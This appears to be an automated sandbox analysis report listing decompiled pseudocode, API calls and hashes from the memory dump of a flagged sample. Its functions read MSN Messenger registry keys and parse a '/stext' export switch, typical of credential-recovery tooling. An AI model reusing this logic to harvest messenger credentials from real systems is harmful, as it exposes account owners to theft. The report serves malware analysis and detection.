                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AddressCloseLibraryLoadProcVersionmemsetstrcpy
                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                        • API String ID: 181880968-2036018995
                                                                        • Opcode ID: f36eb23c2dc7077338fc74569912d0170d623695a7104f0b3b9fc9f5b09292aa
                                                                        • Instruction ID: b4f7ca4f0d473bdd6f3573a0ab4a655380742daec172f7a18688454dd959f7ad
                                                                        • Opcode Fuzzy Hash: f36eb23c2dc7077338fc74569912d0170d623695a7104f0b3b9fc9f5b09292aa
                                                                        • Instruction Fuzzy Hash: D711D871800219FADB24A656DC89DEF77BCDB04309F1008B7F91572191D63D9FA886DD
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040396C(void* __eflags, void* __fp0, intOrPtr _a4) {
                                                                        				char _v528;
                                                                        				intOrPtr _v540;
                                                                        				char _v796;
                                                                        				char _v1052;
                                                                        				void* _v1056;
                                                                        				void* _v1060;
                                                                        				int _v1064;
                                                                        				void* __ebx;
                                                                        				void* __esi;
                                                                        				void* _t21;
                                                                        				long _t23;
                                                                        				void** _t24;
                                                                        				long _t26;
                                                                        				int _t32;
                                                                        				void* _t52;
                                                                        
                                                                        				_t52 = __fp0;
                                                                        				_v540 = 0x412e80;
                                                                        				E004046D7( &_v528);
                                                                        				_t32 = 0;
                                                                        				_v1052 = 0;
                                                                        				_v796 = 0;
                                                                        				_v1064 = 0;
                                                                        				do {
                                                                        					if(_v1064 != _t32) {
                                                                        						__eflags = _v1064 - 1;
                                                                        						if(__eflags != 0) {
                                                                        							_t21 = E0040D5DB( &_v1052, __eflags); // executed
                                                                        						} else {
                                                                        							_t23 = RegOpenKeyExA(0x80000001, "Software\\Microsoft\\MessengerService", _t32, 0x20019,  &_v1060); // executed
                                                                        							__eflags = _t23;
                                                                        							if(_t23 != 0) {
                                                                        								goto L5;
                                                                        							} else {
                                                                        								_t24 =  &_v1060;
                                                                        								goto L4;
                                                                        							}
                                                                        						}
                                                                        					} else {
                                                                        						_t26 = RegOpenKeyExA(0x80000001, "Software\\Microsoft\\MSNMessenger", _t32, 0x20019,  &_v1056); // executed
                                                                        						if(_t26 != 0) {
                                                                        							L5:
                                                                        							_t21 = 0;
                                                                        						} else {
                                                                        							_t24 =  &_v1056;
                                                                        							L4:
                                                                        							_t21 = E0040D4A6( &_v1052, _t24);
                                                                        						}
                                                                        					}
                                                                        					_t32 = 0;
                                                                        					if(_t21 != 0) {
                                                                        						E004038CF(_t52, _a4,  &_v1052);
                                                                        					}
                                                                        					_v1064 = _v1064 + 1;
                                                                        				} while (_v1064 <= 2);
                                                                        				return E004047F1( &_v528);
                                                                        			}



















                                                                        APIs
                                                                          • Part of subcall function 004046D7: strcpy.MSVCRT ref: 00404726
                                                                        • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\MSNMessenger,00000000,00020019,?), ref: 004039C5
                                                                          • Part of subcall function 0040D5DB: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,?,000000FF,00000000,00000000,?,?,00000001), ref: 0040D6A7
                                                                          • Part of subcall function 0040D5DB: strlen.MSVCRT ref: 0040D6B7
                                                                          • Part of subcall function 0040D5DB: strcpy.MSVCRT(?,?), ref: 0040D6C8
                                                                          • Part of subcall function 0040D5DB: LocalFree.KERNEL32(?), ref: 0040D6D5
                                                                        • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\MessengerService,00000000,00020019,?), ref: 004039F7
                                                                        Strings
                                                                        • Software\Microsoft\MSNMessenger, xrefs: 004039BF
                                                                        • Software\Microsoft\MessengerService, xrefs: 004039F1
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Openstrcpy$ByteCharFreeLocalMultiWidestrlen
                                                                        • String ID: Software\Microsoft\MSNMessenger$Software\Microsoft\MessengerService
                                                                        • API String ID: 1910562259-1741179510
                                                                        • Opcode ID: a042053f0881545de1053e7963e322542f87d6f2c27a3a690180a3307b8871c0
                                                                        • Instruction ID: e1373b66f94ab8684edf5be4eb08dc620599410c0cc400d8dd4f2e2a864aae35
                                                                        • Opcode Fuzzy Hash: a042053f0881545de1053e7963e322542f87d6f2c27a3a690180a3307b8871c0
                                                                        • Instruction Fuzzy Hash: 4F11F6B1608345AEC320DF5188819ABBBEC9B84355F50893FF584A2081D338DA09CAAB
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040ED0B(unsigned int _a4, CHAR* _a8, CHAR* _a12) {
                                                                        				struct HRSRC__* _t12;
                                                                        				void* _t16;
                                                                        				void* _t17;
                                                                        				signed int _t26;
                                                                        				signed int _t29;
                                                                        				signed int _t33;
                                                                        				struct HRSRC__* _t35;
                                                                        				signed int _t36;
                                                                        
                                                                        				_t12 = FindResourceA(_a4, _a12, _a8); // executed
                                                                        				_t35 = _t12;
                                                                        				if(_t35 != 0) {
                                                                        					_t33 = SizeofResource(_a4, _t35);
                                                                        					if(_t33 > 0) {
                                                                        						_t16 = LoadResource(_a4, _t35);
                                                                        						if(_t16 != 0) {
                                                                        							_t17 = LockResource(_t16);
                                                                        							if(_t17 != 0) {
                                                                        								_a4 = _t33;
                                                                        								_t29 = _t33 * _t33;
                                                                        								_t36 = 0;
                                                                        								_t7 =  &_a4;
                                                                        								 *_t7 = _a4 >> 2;
                                                                        								if( *_t7 != 0) {
                                                                        									do {
                                                                        										_t26 =  *(_t17 + _t36 * 4) * _t36 * _t33 * 0x00000011 ^  *(_t17 + _t36 * 4) + _t29;
                                                                        										_t36 = _t36 + 1;
                                                                        										_t29 = _t26;
                                                                        									} while (_t36 < _a4);
                                                                        								}
                                                                        								 *0x417110 =  *0x417110 + _t29 ^ _t33;
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return 1;
                                                                        			}












                                                                        APIs
                                                                        • FindResourceA.KERNEL32(?,?,?), ref: 0040ED18
                                                                        • SizeofResource.KERNEL32(?,00000000), ref: 0040ED29
                                                                        • LoadResource.KERNEL32(?,00000000), ref: 0040ED39
                                                                        • LockResource.KERNEL32(00000000), ref: 0040ED44
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Resource$FindLoadLockSizeof
                                                                        • String ID:
                                                                        • API String ID: 3473537107-0
                                                                        • Opcode ID: 4124c9c16d571b3a6a6dda8a6002e2ff58418d98f6681f6753ff1314487d049b
                                                                        • Instruction ID: 6bf1e5af94a697a74b0619517749427008784a8e56cd275cc50dd62f01ccc87b
                                                                        • Opcode Fuzzy Hash: 4124c9c16d571b3a6a6dda8a6002e2ff58418d98f6681f6753ff1314487d049b
                                                                        • Instruction Fuzzy Hash: 450104367002126BCB185F66CD4599B7FAAFF852903488536AD09DA360D770C921C688
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 95%
                                                                        			E0040EA72(void* __ecx, intOrPtr* __edi, void* __eflags, intOrPtr _a4, CHAR* _a8, CHAR* _a12, intOrPtr _a16, CHAR* _a20) {
                                                                        				void _v8199;
                                                                        				char _v8200;
                                                                        				void* __ebx;
                                                                        				int _t23;
                                                                        				CHAR* _t31;
                                                                        
                                                                        				E004118A0(0x2004, __ecx);
                                                                        				_v8200 = 0;
                                                                        				if(_a4 == 0) {
                                                                        					memset( &_v8199, 0, 0x2000);
                                                                        					GetPrivateProfileStringA(_a8, _a12, 0x412466,  &_v8200, 0x2000, _a20); // executed
                                                                        					_t23 = E004067DC( &_v8200, __edi, _a16);
                                                                        				} else {
                                                                        					memset( &_v8199, 0, 0x2000);
                                                                        					_t31 =  &_v8200;
                                                                        					E00406763(_t31, _a16,  *__edi);
                                                                        					_t23 = WritePrivateProfileStringA(_a8, _a12, _t31, _a20);
                                                                        				}
                                                                        				return _t23;
                                                                        			}









                                                                        APIs
                                                                        • memset.MSVCRT ref: 0040EA9A
                                                                          • Part of subcall function 00406763: sprintf.MSVCRT ref: 0040679B
                                                                          • Part of subcall function 00406763: memcpy.MSVCRT ref: 004067AE
                                                                        • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 0040EABE
                                                                        • memset.MSVCRT ref: 0040EAD5
                                                                        • GetPrivateProfileStringA.KERNEL32(?,?,Function_00012466,?,00002000,?), ref: 0040EAF3
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                        • String ID:
                                                                        • API String ID: 3143880245-0
                                                                        • Opcode ID: 55a900beb3324ae435e234628281be75478a67a5b39370e1d0f1c50bd7ccf1f7
                                                                        • Instruction ID: dd976746f5256500085d4a95e5c89bc7782f2e7a6919953fe2ebae93c0a04965
                                                                        • Opcode Fuzzy Hash: 55a900beb3324ae435e234628281be75478a67a5b39370e1d0f1c50bd7ccf1f7
                                                                        • Instruction Fuzzy Hash: 6F01A172800219BFEF12AF51DC89DDB3B79EF04344F0044A6B609A2062D6359A64CB68
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 96%
                                                                        			E0040B785(intOrPtr __eax, intOrPtr* __ebx) {
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				intOrPtr _t14;
                                                                        				intOrPtr _t15;
                                                                        				void* _t16;
                                                                        				void* _t17;
                                                                        				struct HICON__* _t19;
                                                                        				intOrPtr* _t23;
                                                                        				void* _t25;
                                                                        
                                                                        				_t23 = __ebx;
                                                                        				_t14 = __eax;
                                                                        				 *((intOrPtr*)(__ebx + 0x124)) = 0;
                                                                        				 *__ebx = 0x41356c;
                                                                        				 *((intOrPtr*)(__ebx + 0x258)) = 0;
                                                                        				_push(0x14);
                                                                        				 *((intOrPtr*)(__ebx + 0x374)) = 0;
                                                                        				L004115D0();
                                                                        				if(__eax == 0) {
                                                                        					_t14 = 0;
                                                                        					__eflags = 0;
                                                                        				} else {
                                                                        					 *0x417114 = __eax;
                                                                        				}
                                                                        				 *((intOrPtr*)(_t23 + 0x36c)) = _t14;
                                                                        				L004115D0(); // executed
                                                                        				_t32 = _t14;
                                                                        				_t25 = 0xf38;
                                                                        				if(_t14 == 0) {
                                                                        					_t15 = 0;
                                                                        					__eflags = 0;
                                                                        				} else {
                                                                        					_t15 = E00404016(_t14, _t32);
                                                                        				}
                                                                        				 *((intOrPtr*)(_t23 + 0x370)) = _t15;
                                                                        				 *((intOrPtr*)(_t23 + 0x378)) = 0;
                                                                        				 *((intOrPtr*)(_t23 + 0x260)) = 0;
                                                                        				 *((intOrPtr*)(_t23 + 0x25c)) = 0;
                                                                        				 *((intOrPtr*)(_t23 + 0x154)) = 0;
                                                                        				_t16 =  *(_t23 + 0x258);
                                                                        				if(_t16 != 0) {
                                                                        					DeleteObject(_t16);
                                                                        					 *(_t23 + 0x258) = 0;
                                                                        				}
                                                                        				_t17 = E00406252(); // executed
                                                                        				 *(_t23 + 0x258) = _t17;
                                                                        				E00401000(_t25, _t23 + 0x158, 0x413480);
                                                                        				_t19 = LoadIconA( *0x416b94, 0x65); // executed
                                                                        				E004017A4(_t23, _t19);
                                                                        				return _t23;
                                                                        			}













                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ??2@$DeleteIconLoadObject
                                                                        • String ID:
                                                                        • API String ID: 1986663749-0
                                                                        • Opcode ID: 0423a71d4927b18fd553b5e50ae37bff09cbbc21581d25ca9f1141fabe86d1e7
                                                                        • Instruction ID: 38da8263615bef274e7c21802c355ecfe582676222a25676d72b73c1d19d8401
                                                                        • Opcode Fuzzy Hash: 0423a71d4927b18fd553b5e50ae37bff09cbbc21581d25ca9f1141fabe86d1e7
                                                                        • Instruction Fuzzy Hash: 8C1151B09056509BCF519F259C887C53BA4EB84B41F1804BBFD08EF3A6DBB845418BAC
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 72%
                                                                        			E00411932() {
                                                                        				intOrPtr _t1;
                                                                        				intOrPtr _t2;
                                                                        				intOrPtr _t3;
                                                                        				intOrPtr _t4;
                                                                        
                                                                        				_t1 =  *0x417528;
                                                                        				if(_t1 != 0) {
                                                                        					_push(_t1);
                                                                        					L004115D6();
                                                                        				}
                                                                        				_t2 =  *0x417530;
                                                                        				if(_t2 != 0) {
                                                                        					_push(_t2); // executed
                                                                        					L004115D6(); // executed
                                                                        				}
                                                                        				_t3 =  *0x41752c;
                                                                        				if(_t3 != 0) {
                                                                        					_push(_t3);
                                                                        					L004115D6();
                                                                        				}
                                                                        				_t4 =  *0x417534;
                                                                        				if(_t4 != 0) {
                                                                        					_push(_t4); // executed
                                                                        					L004115D6(); // executed
                                                                        					return _t4;
                                                                        				}
                                                                        				return _t4;
                                                                        			}








                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ??3@
                                                                        • String ID:
                                                                        • API String ID: 613200358-0
                                                                        • Opcode ID: 91c60f5c1f6e7dd8e91e3fe6036ebb2df298eb5d5c74a2e7dfa5f35f51adb5a0
                                                                        • Instruction ID: d6dbe33ea61767d3fff50222484a645f5af73bc96bc71b3580d13e53834dfd00
                                                                        • Opcode Fuzzy Hash: 91c60f5c1f6e7dd8e91e3fe6036ebb2df298eb5d5c74a2e7dfa5f35f51adb5a0
                                                                        • Instruction Fuzzy Hash: E0E012B0319201A68E20AB7BBD40A9323AE2A44310354806FF206D2AB1DE38D8C0C63C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 78%
                                                                        			E0040787D() {
                                                                        				void* _t13;
                                                                        				signed int _t16;
                                                                        				signed int _t18;
                                                                        				signed int _t27;
                                                                        				signed int _t29;
                                                                        				intOrPtr _t33;
                                                                        
                                                                        				_t33 =  *0x417540;
                                                                        				if(_t33 == 0) {
                                                                        					_push(0x8000);
                                                                        					 *0x417540 = 0x8000;
                                                                        					 *0x417544 = 0x100;
                                                                        					 *0x417548 = 0x1000; // executed
                                                                        					L004115D0(); // executed
                                                                        					 *0x417528 = 0x8000;
                                                                        					_t27 = 4;
                                                                        					_t16 =  *0x417544 * _t27;
                                                                        					_push( ~(0 | _t33 > 0x00000000) | _t16);
                                                                        					L004115D0();
                                                                        					 *0x417530 = _t16;
                                                                        					_t29 = 4;
                                                                        					_t18 =  *0x417544 * _t29;
                                                                        					_push( ~(0 | _t33 > 0x00000000) | _t18);
                                                                        					L004115D0();
                                                                        					_push( *0x417548);
                                                                        					 *0x417534 = _t18; // executed
                                                                        					L004115D0(); // executed
                                                                        					 *0x41752c = _t18;
                                                                        					return _t18;
                                                                        				}
                                                                        				return _t13;
                                                                        			}










                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ??2@
                                                                        • String ID:
                                                                        • API String ID: 1033339047-0
                                                                        • Opcode ID: d8185543564e7c8b2bd4b8c3e8d173cfd25ed724cb8acf65200bb5964d18c7b3
                                                                        • Instruction ID: 98653883aa4781a1616f5f21c4e99a92f1a36013e955d8e4b32a99e29624f39b
                                                                        • Opcode Fuzzy Hash: d8185543564e7c8b2bd4b8c3e8d173cfd25ed724cb8acf65200bb5964d18c7b3
                                                                        • Instruction Fuzzy Hash: E6F012B1589210BFDB549B39ED067A53AB2A748394F10917EE207CA6F5FB7454408B4C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004060FA(signed int* __eax, void* __edx, void** __edi, signed int _a4, intOrPtr _a8) {
                                                                        				void* _t8;
                                                                        				void* _t13;
                                                                        				signed int _t16;
                                                                        				void** _t21;
                                                                        				signed int _t22;
                                                                        
                                                                        				_t21 = __edi;
                                                                        				_t22 =  *__eax;
                                                                        				if(__edx < _t22) {
                                                                        					return 0;
                                                                        				} else {
                                                                        					_t13 =  *__edi;
                                                                        					do {
                                                                        						 *__eax =  *__eax + _a8;
                                                                        						_t16 =  *__eax;
                                                                        					} while (__edx >= _t16);
                                                                        					_t8 = malloc(_t16 * _a4); // executed
                                                                        					 *__edi = _t8;
                                                                        					if(_t22 > 0) {
                                                                        						if(_t8 != 0) {
                                                                        							memcpy(_t8, _t13, _t22 * _a4);
                                                                        						}
                                                                        						free(_t13);
                                                                        					}
                                                                        					return 0 |  *_t21 != 0x00000000;
                                                                        				}
                                                                        			}









                                                                        APIs
                                                                        • malloc.MSVCRT ref: 00406116
                                                                        • memcpy.MSVCRT ref: 0040612E
                                                                        • free.MSVCRT(00000000,00000000,73B74DE0,00406B49,00000001,?,00000000,73B74DE0,00406D88,00000000,?,?), ref: 00406137
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: freemallocmemcpy
                                                                        • String ID:
                                                                        • API String ID: 3056473165-0
                                                                        • Opcode ID: c16869745dd056c7ef743fb7ed117d9ff76353dfe782dc17f391ee5363500ee0
                                                                        • Instruction ID: d153bd7f556b54fa1e8e463c7175d954409fdcf13f6af5892cc53e784d19f72a
                                                                        • Opcode Fuzzy Hash: c16869745dd056c7ef743fb7ed117d9ff76353dfe782dc17f391ee5363500ee0
                                                                        • Instruction Fuzzy Hash: 9DF0E9726052219FC7089F79B98145BB3DDAF84324B11482FF546D7292D7389C50C798
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 93%
                                                                        			E0040B8D7(void* __edi, void* __eflags) {
                                                                        				void* __esi;
                                                                        				signed int _t24;
                                                                        				intOrPtr _t31;
                                                                        				intOrPtr _t38;
                                                                        				void* _t42;
                                                                        				void* _t45;
                                                                        				void* _t49;
                                                                        				void* _t51;
                                                                        				intOrPtr _t52;
                                                                        
                                                                        				_t54 = __eflags;
                                                                        				_t49 = __edi;
                                                                        				_t38 = 0;
                                                                        				E004023D4( *((intOrPtr*)(__edi + 0x370)), __eflags, 0, 0);
                                                                        				 *((intOrPtr*)(__edi + 0x108)) = 0;
                                                                        				E00401E8B(_t54,  *((intOrPtr*)(__edi + 0x370)) + 0xb20); // executed
                                                                        				_t24 =  *((intOrPtr*)(__edi + 0x37c));
                                                                        				if( *((intOrPtr*)(_t24 + 0x30)) <= 0) {
                                                                        					_t51 = 0x412466;
                                                                        				} else {
                                                                        					if( *((intOrPtr*)(_t24 + 0x1c)) <= 0) {
                                                                        						_t45 = 0;
                                                                        						__eflags = 0;
                                                                        					} else {
                                                                        						_t45 =  *((intOrPtr*)( *((intOrPtr*)(_t24 + 0xc)))) +  *((intOrPtr*)(_t24 + 0x10));
                                                                        					}
                                                                        					_t51 = _t45;
                                                                        				}
                                                                        				_push(_t51);
                                                                        				_push("/stext");
                                                                        				L004115B2();
                                                                        				if(_t24 != 0) {
                                                                        					_t52 = E0040B841(_t24, _t51);
                                                                        					__eflags = _t52 - _t38;
                                                                        					if(_t52 <= _t38) {
                                                                        						goto L15;
                                                                        					}
                                                                        					goto L9;
                                                                        				} else {
                                                                        					_t52 = 1;
                                                                        					L9:
                                                                        					E0040AF17(_t49, _t38); // executed
                                                                        					E0040A5AC(_t49);
                                                                        					_t31 =  *((intOrPtr*)(_t49 + 0x37c));
                                                                        					if( *((intOrPtr*)(_t31 + 0x30)) <= 1) {
                                                                        						_t42 = 0x412466;
                                                                        					} else {
                                                                        						_t59 =  *((intOrPtr*)(_t31 + 0x1c)) - 1;
                                                                        						if( *((intOrPtr*)(_t31 + 0x1c)) <= 1) {
                                                                        							_t42 = 0;
                                                                        						} else {
                                                                        							_t42 =  *((intOrPtr*)( *((intOrPtr*)(_t31 + 0xc)) + 4)) +  *((intOrPtr*)(_t31 + 0x10));
                                                                        						}
                                                                        					}
                                                                        					 *((intOrPtr*)( *((intOrPtr*)(_t49 + 0x370)) + 0x1bc)) =  *((intOrPtr*)( *((intOrPtr*)(_t49 + 0x36c)) + 0xc));
                                                                        					E00409B32( *((intOrPtr*)(_t49 + 0x370)),  *((intOrPtr*)(_t49 + 0x370)), _t49, _t59, _t42, _t52); // executed
                                                                        					_t38 = 1;
                                                                        					E0040B0C2(_t49);
                                                                        					L15:
                                                                        					return _t38;
                                                                        				}
                                                                        			}

                                                                        APIs
                                                                          • Part of subcall function 00401E8B: memset.MSVCRT ref: 00401EAD
                                                                          • Part of subcall function 00401E8B: strlen.MSVCRT ref: 00401EC6
                                                                          • Part of subcall function 00401E8B: strlen.MSVCRT ref: 00401ED4
                                                                          • Part of subcall function 00401E8B: strlen.MSVCRT ref: 00401F1A
                                                                          • Part of subcall function 00401E8B: strlen.MSVCRT ref: 00401F28
                                                                        • _stricmp.MSVCRT(/stext,00412466,?,00000000,00000000,?,?,?,0040BAC6), ref: 0040B92B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: strlen$_stricmpmemset
                                                                        • String ID: /stext
                                                                        • API String ID: 3575250601-3817206916
                                                                        • Opcode ID: ba91a629983a4474272755d1190fe0abc20447847f5b5280d74d03c064ef9f45
                                                                        • Instruction ID: 7d69c3f5364ef88ad9e24340ba35af89a1d621815374fdce2acadc9eabf4c73c
                                                                        • Opcode Fuzzy Hash: ba91a629983a4474272755d1190fe0abc20447847f5b5280d74d03c064ef9f45
                                                                        • Instruction Fuzzy Hash: 45213EB1614111DFC35C9B29C881D65B3A8FB45314B1582BFF91AA7292C738ED518BCD
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00406252() {
                                                                        				struct tagLOGFONTA _v64;
                                                                        				struct HFONT__* _t6;
                                                                        
                                                                        				E00406191( &_v64, "Arial", 0xe, 0);
                                                                        				_t6 = CreateFontIndirectA( &_v64); // executed
                                                                        				return _t6;
                                                                        			}

                                                                        APIs
                                                                          • Part of subcall function 00406191: memset.MSVCRT ref: 0040619B
                                                                          • Part of subcall function 00406191: strcpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,00406269,Arial,0000000E,00000000), ref: 004061DB
                                                                        • CreateFontIndirectA.GDI32(?), ref: 00406270
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateFontIndirectmemsetstrcpy
                                                                        • String ID: Arial
                                                                        • API String ID: 3275230829-493054409
                                                                        • Opcode ID: 7d2b7ca13242ecb95fba35a4d161325a02a1357963518cd5c2775a7b681f11d7
                                                                        • Instruction ID: 9d865b7f43533acfebf3b00b6ce8d331e43bccbbf35dbaed0a6f3a0435680c9f
                                                                        • Opcode Fuzzy Hash: 7d2b7ca13242ecb95fba35a4d161325a02a1357963518cd5c2775a7b681f11d7
                                                                        • Instruction Fuzzy Hash: B3D0C970E4020D76E600BAA0FD07B897BAC5B00605F508421BA41F51E2FAE8A15586A9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004047A0(CHAR* __esi, void* __eflags) {
                                                                        				struct HINSTANCE__* _t8;
                                                                        				char _t12;
                                                                        				char* _t15;
                                                                        				CHAR* _t17;
                                                                        
                                                                        				_t17 = __esi;
                                                                        				E004047F1(__esi);
                                                                        				_t8 = LoadLibraryA(__esi); // executed
                                                                        				__esi[0x200] = _t8;
                                                                        				if(_t8 != 0) {
                                                                        					_t12 = GetProcAddress(_t8,  &(__esi[0xff]));
                                                                        					__esi[0x208] = _t12;
                                                                        					if(_t12 != 0) {
                                                                        						__esi[0x204] = 1;
                                                                        					}
                                                                        				}
                                                                        				_t15 =  &(_t17[0x204]);
                                                                        				if( *_t15 == 0) {
                                                                        					E004047F1(_t17);
                                                                        				}
                                                                        				return  *_t15;
                                                                        			}

                                                                        APIs
                                                                          • Part of subcall function 004047F1: FreeLibrary.KERNELBASE(?,?), ref: 00404806
                                                                        • LoadLibraryA.KERNELBASE(?,0040D60E,80000001,73AFF420), ref: 004047A8
                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 004047C0
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Library$AddressFreeLoadProc
                                                                        • String ID:
                                                                        • API String ID: 145871493-0
                                                                        • Opcode ID: cbabdfec5215e458202f737861f40a15f802b817f3ec498c61102a043c0cc1ea
                                                                        • Instruction ID: bd92e302f737a6b7e7c2aa8ed3bd721d1bcdfa8038008227cdd2def65d6b9a1b
                                                                        • Opcode Fuzzy Hash: cbabdfec5215e458202f737861f40a15f802b817f3ec498c61102a043c0cc1ea
                                                                        • Instruction Fuzzy Hash: F1F039B02007028BD7209F39D84879B77E8BF85700F00853EF266E3281EB78A951CB28
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetPrivateProfileIntA.KERNEL32 ref: 0040EB35
                                                                          • Part of subcall function 0040EA26: memset.MSVCRT ref: 0040EA44
                                                                          • Part of subcall function 0040EA26: _itoa.MSVCRT ref: 0040EA5B
                                                                          • Part of subcall function 0040EA26: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 0040EA6A
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: PrivateProfile$StringWrite_itoamemset
                                                                        • String ID:
                                                                        • API String ID: 4165544737-0
                                                                        • Opcode ID: 41fbf1d09f89329d89d85b9c1c83700b09fa1e2b362e37a4bb4b326ca53279f5
                                                                        • Instruction ID: f55a197cdd86fa31c53d12907dd8f70643f2484b8232c3448506387801693677
                                                                        • Opcode Fuzzy Hash: 41fbf1d09f89329d89d85b9c1c83700b09fa1e2b362e37a4bb4b326ca53279f5
                                                                        • Instruction Fuzzy Hash: F2E0B632000109FBCF125F95EC01AAA7F76FF08314F148869FD5855161D332A570EF55
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004047F1(void* __eax) {
                                                                        				struct HINSTANCE__* _t5;
                                                                        				signed int* _t7;
                                                                        
                                                                        				 *(__eax + 0x204) =  *(__eax + 0x204) & 0x00000000;
                                                                        				_t7 = __eax + 0x200;
                                                                        				_t5 =  *_t7;
                                                                        				if(_t5 != 0) {
                                                                        					_t5 = FreeLibrary(_t5); // executed
                                                                        					 *_t7 =  *_t7 & 0x00000000;
                                                                        				}
                                                                        				return _t5;
                                                                        			}

                                                                        APIs
                                                                        • FreeLibrary.KERNELBASE(?,?), ref: 00404806
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FreeLibrary
                                                                        • String ID:
                                                                        • API String ID: 3664257935-0
                                                                        • Opcode ID: 44cb22c5a6e339dc322f31723d6313ec8e4e2f7ef4db3de4f35608b5b7650eec
                                                                        • Instruction ID: 9a892a7b4d94419058e15305363ecf1fbcdc16662e35282e5c511663eadef616
                                                                        • Opcode Fuzzy Hash: 44cb22c5a6e339dc322f31723d6313ec8e4e2f7ef4db3de4f35608b5b7650eec
                                                                        • Instruction Fuzzy Hash: 90D012721003118FD7705F14EC0CBE133E8AF40312F2584B8EA55E7155C3749584CA58
                                                                        Uniqueness

